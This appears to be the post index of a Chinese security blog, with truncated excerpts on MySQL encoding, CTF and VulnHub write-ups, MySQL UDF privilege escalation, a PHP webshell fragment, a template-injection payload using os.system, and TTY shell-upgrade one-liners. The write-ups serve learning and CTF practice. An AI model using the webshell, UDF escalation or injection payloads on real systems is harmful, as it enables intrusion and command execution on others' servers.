MoR03r MoR03r's Blog
查看mysql数据库及表编码格式
发表于 2019-3-11 | 综合
查看mysql数据库及表编码格式 1.查看数据库编码格式 mysql> show variables like 'character_set_database' 2.查看数据表的编码格式 mysql> show create table <表名>; 3.创建数据库时指定数据库的字符集 mysql>create database <数据库名> character set utf8; 4.创建数据表时指定数据表的编码格式 create table tb_books ( name ...

阅读全文>>

一次pyc文件恢复
发表于 2019-2-16 | CTF
一次pyc文件恢复 Python Pyc的文件格式 [compile.h] /* Bytecode object */ typedef struct { PyObject_HEAD int co_argcount; /* #arguments, except *args */ int co_nlocals; /* #local variables */ int co_stacksize; /* #entries nee...

阅读全文>>

VulnHub渗透测试FourAndSix2
发表于 2018-12-12 | Vulnhub
VulnHub渗透测试FourAndSix2 靶机 https://www.vulnhub.com/entry/fourandsix-201,266/ 运行环境 VM Workstation VM Esxi VirtualBox 说明 获取root权限并且读取/root/flag.txt 设置 将下载好的ova文件直接导入虚拟机(这里我使用VM Esxi导入ova文件) 发现主机 打开Esxi虚拟机控制台网页,点击刚才安装好的虚拟机,可...

阅读全文>>

Mysql udf提权
发表于 2018-12-2 | exploit
UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysql\linux\64的libmysqludf_sys.so文件,但是测试中发现会报错 mysql> create function sys_eval returns string soname 'udf.so'; ERROR 1126 (HY000): Can't open shared library 'udf.so' (errno:...

阅读全文>>

湖湘杯Common Crypto
发表于 2018-11-21 | CTF
扔入IDA进行分析: 获得关键字符串8aeb45c62003ba52e46c9600b3699b8c30386334623434393136633963356136 继续分析程序逻辑,从sbox可以发现这个程序其实是一个AES加密拼接字符串,刚才这段是密文和字符串拼接体,只需要找到密钥就能解决: 找到密钥后,写脚本解决:

阅读全文>>

发现一个小马的利用方式
发表于 2018-10-25 | 综合
先贴代码吧 <?php $k = @$_SERVER["HTTP_DNT"]; $d = $p = ''; foreach ($_POST as $a => $b) $d.= $b; $t = eccode($d, 'DECODE', $k); $t = gzuncompress($t); $p = unserialize($t); $_POST = $p; $_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\);$/', '\1...

阅读全文>>

护网杯ltshop题目记录
发表于 2018-10-25 | CTF
首先看一下题目首页,常规检查一遍,什么都没有发现 然后注册用户,登录查看一番 经过一番测试,发现购买大辣条的地方存在一点点的条件竞争,可以购买到5包或以上的辣条 用burp抓包,发送到intruder模块直接多线程跑即可得到 成功购买到5包以上辣条,然后在兑换辣条之王的位置进行整数溢出 测试结果是0xffff ffff ffff ffff转十进制后,先除以5然后再加1 这里的后端逻辑可能是5包大辣条换一包辣条之王,然后提交x份,那么就需要5x包辣条,但是...

阅读全文>>

国赛半决赛(华北赛区)Web7题目解题分享
发表于 2018-10-14 | CTF
Web7解题思路 MoR03r解题思路(非预期) 打开网站后,注册一个用户登录,发现“咸鱼”这里有个上传 上传一张图片看看效果,发现会跳转到/user这个页面 比赛时,队友找到了一个非预期,就是上传的文件名可以包含路径,直接覆盖原文件 利用这个非预期上传到/home/ciscn/www/sshop/template/info.html,直接覆盖info.html这个模板,在info.html中加入一句 {% import os %}{{ os.system('ls > /home/ciscn...

阅读全文>>

cmd下查询3389远程桌面端口
发表于 2018-9-28 | 综合
cmd下查询3389远程桌面端口 因为要经常用到,在博客中做个笔记 在命令行下执行 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 返回: 其中的0xd3d即为端口,转为十进制: Windows下可以用计算器:

阅读全文>>

反弹一个TTY Shell
发表于 2018-9-7 | 综合
通常在webshell中反弹一个shell到主机或VPS中,产生的shell并不是tty(交互式)shell 此时我们无法通过输入su命令来切换用户,故有此文 Python python -c 'import pty; pty.spawn("/bin/sh")' 下面的方式未验证成功,Python中没有echo,如果去掉echo保存到py文件中可以成功 echo os.system('/bin/bash') Bash /bin/sh -i Perl 直接执行 perl -e 'exec "/b...

阅读全文>>

TOP